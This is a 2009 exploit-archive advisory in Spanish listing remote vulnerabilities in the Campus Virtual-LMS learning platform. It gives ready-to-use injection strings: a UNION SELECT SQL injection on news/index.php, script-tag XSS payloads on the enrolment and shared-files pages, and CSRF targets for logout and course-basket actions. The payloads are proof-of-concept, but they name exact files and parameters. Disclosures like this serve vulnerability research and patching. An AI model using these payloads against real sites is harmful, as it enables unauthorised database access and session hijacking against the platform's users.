[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Campus Virtual-LMS (XSS/SQL Injection) Multiple Remote Vulnerabilities
# Published : 2009-06-12
# Author : Yasi?3n
# Previous Title : 4images <= 1.7.7 Filter Bypass HTML Injection/XSS Vulnerability
# Next Title : phpWebThings <= 1.5.2 MD5 Hash Retrieve/File Disclosure Exploit
+-----------------------------------------------------------------------------+
LMS: Campus Virtual-LMS
WEB: http://campusvirtualcomputrade.cae.net
Autor: Yasi?3n
Fecha: 12 jun 2009
+-----------------------------------------------------------------------------+
-----------------------------------------------------------------------------+
[+] SQLi
-----------------------------------------------------------------------------+
Archivo: news/index.php [no logged]
GET: ?id
Inyecci?3n: -1 union select 1,2,3,4,5,6,7
-----------------------------------------------------------------------------+
-----------------------------------------------------------------------------+
[+] XSS
-----------------------------------------------------------------------------+
Archivo: enrolments/step1.php [no logged]
GET: ?courseid
Inyecci?3n: 1"><script>alert(/xD/.source)</script>
Archivo: files/shared_list.php [logged]
GET/POST: ?search
Inyecci?3n: "><script>alert(/xD/.source)</script><!--
Archivo: files/shared_list.php [logged]
GET: ?siteid
Inyecci?3n: "><script>alert(/xD/.source)</script><!--
-----------------------------------------------------------------------------+
-----------------------------------------------------------------------------+
[+] CSRF
-----------------------------------------------------------------------------+
Archivo: login/logout.php
Info: Desconecta al usuario mediante una imagen, un redireccionamiento, un
link...
Archivo: enrolments/step2.php
GET: ?action=[ACTION]&orderid=[ORDERID]&courseid=[COURSEID]
Info: A?±ade o elimina [ADD/DELETE] el curso identificado por COURSEID a la
cesta identificada por ODERID. Ser?-a necesario conocer por adelantado la
cesta del usuario. (No explotable)
-----------------------------------------------------------------------------+
+-----------------------------------------------------------------------------+
Gretz: UnderSecurity.net
+-----------------------------------------------------------------------------+
# www.Syue.com [2009-06-12]